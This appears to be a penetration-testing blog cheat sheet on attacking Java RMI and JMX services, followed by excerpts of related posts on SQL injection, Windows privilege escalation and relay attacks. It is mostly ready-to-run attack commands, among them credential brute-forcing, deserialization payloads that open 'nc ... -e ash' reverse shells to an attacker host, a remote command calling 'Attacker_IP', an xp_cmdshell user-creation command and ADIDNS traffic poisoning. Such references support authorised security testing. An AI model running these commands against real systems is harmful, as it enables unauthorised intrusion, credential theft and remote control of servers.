Skip to main content

JMX RMI Pentest

By

 
RMI can be run on any nonstandard port and when RMI is running you will observer one more endpoint port connected to it (find it from nmap easily by running rmi-dumpregistry )

#jmxrmi  bound name and its signatures might be vulnerable to MLetMbean Vuln, where MBean that can be used for loading additional MBeans over the network.
java.lang.String getVersion()
javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg)
Java RMI Registry - Port 1616

nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616
BaRMIe

#Download the package from releases
https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 

java -jar BaRMIe.jar -enum 192.168.1.11 5000
java -jar BaRMIe.jar -attack 192.168.1.11 5000
Remote Method Guesser

https://github.com/qtc-de/remote-method-guesser  
java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum

#Look for Vulnerabilities
java -jar rmg.jar enum 10.10.10.10 5000

#Get bound names & available method signatures
java -jar rmg.jar guess 10.10.10.10 5000

#Command Exec - Example
java -jar rmg.jar call 10.10.10.10 5000 "wget Attacker_IP:8000/worked" --signature 'String execute(String cmd)' --bound-name jmxrmi

#Exploit CVE-2019-2684; Try to bind client locally; doesnt work for JMX RMI
java -jar rmg.jar bind 10.10.10.10 5000 10.11.11.11:8080 my-object --localhost-bypass 

Beanshooter
#Good for JMX Severs
Source - https://github.com/qtc-de/beanshooter#Serial 

#Download package from repo
https://github.com/qtc-de/beanshooter/releases

#Check for auth and possible attr
#If auth is enabled; cannot go further. 
java -jar beanshooter.jar info 10.10.10.10 5000

#Enum - Check for vulns (Auth and Pre-auth Deserialization)
java -jar beanshooter.jar enum 10.10.10.10 5000

#Bruteforce creds
java -jar beanshooter.jar brute 10.10.10.10 5000 --username-file /usr/share/wordlists/user.txt --password-file /usr/share/wordlists/pass.txt

#You might require ysoserial.jar, download and copy it to /opt/yso.jar or add an arg "--yso /opt/yso.jar"
#Get a REVERSE SHELL;
java -jar beanshooter.jar serial 10.10.10.10 5000 CommonsCollections6 "nc 10.11.11.11 443 -e ash" --username admin --password admin

#Add --preauth if pre-auth deserialization is enabled
java -jar beanshooter.jar serial 10.10.10.10 5000 --preauth CommonsCollections6 "nc 10.11.11.11 443 -e ash"

#If SSL is enabled
java -jar beanshooter.jar enum --ssl 10.10.10.10 5000

#If Remote MBean server Does not require auth
#This might require tonka; you can find it in beanshooter repo; 
https://github.com/qtc-de/beanshooter#deploy 

RMIScout

#Download the package 
https://github.com/BishopFox/rmiscout/releases

git clone https://github.com/BishopFox/rmiscout.git 

#Bruteforce
java -jar rmiscout.jar bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

#Wordlist
java -jar rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>


Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more